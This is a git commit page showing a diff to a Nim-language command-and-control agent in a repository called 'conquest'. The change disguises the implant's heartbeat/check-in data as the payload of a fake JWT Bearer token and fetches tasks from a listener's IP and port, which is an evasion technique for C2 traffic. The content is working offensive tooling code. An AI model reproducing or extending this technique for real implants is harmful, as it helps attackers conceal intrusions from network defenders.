admin/conquest
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Updated C2 communication to hide heartbeat data in JWT token.

Browse Source
This commit is contained in:
Jakob Friedl
2025-08-13 13:38:39 +02:00
parent 0e205d34d3
commit b7622dd72f
6 changed files with 27 additions and 27 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
src/agent/core/http.nim
View File

@@ -1,4 +1,4 @@
import httpclient, json, strformat, asyncdispatch
import httpclient, json, strformat, strutils, asyncdispatch, base64
import ../../common/[types, utils]
@@ -35,16 +35,15 @@ proc getTasks*(config: AgentConfig, checkinData: seq[byte]): string =
var responseBody = ""
# Define HTTP headers
# The heartbeat data is placed within a JWT token as the payload (Base64URL-encoded)
let payload = encode(checkinData, safe = true).replace("=", "")
client.headers = newHttpHeaders({
"Content-Type": "application/octet-stream",
"Content-Length": $checkinData.len
"Authorization": fmt"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.{payload}.KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30"
})
let body = checkinData.toString()
try:
# Retrieve binary task data from listener and convert it to seq[bytes] for deserialization
responseBody = waitFor client.postContent(fmt"http://{config.ip}:{$config.port}/tasks", body)
responseBody = waitFor client.getContent(fmt"http://{config.ip}:{$config.port}/tasks")
return responseBody
except CatchableError as err: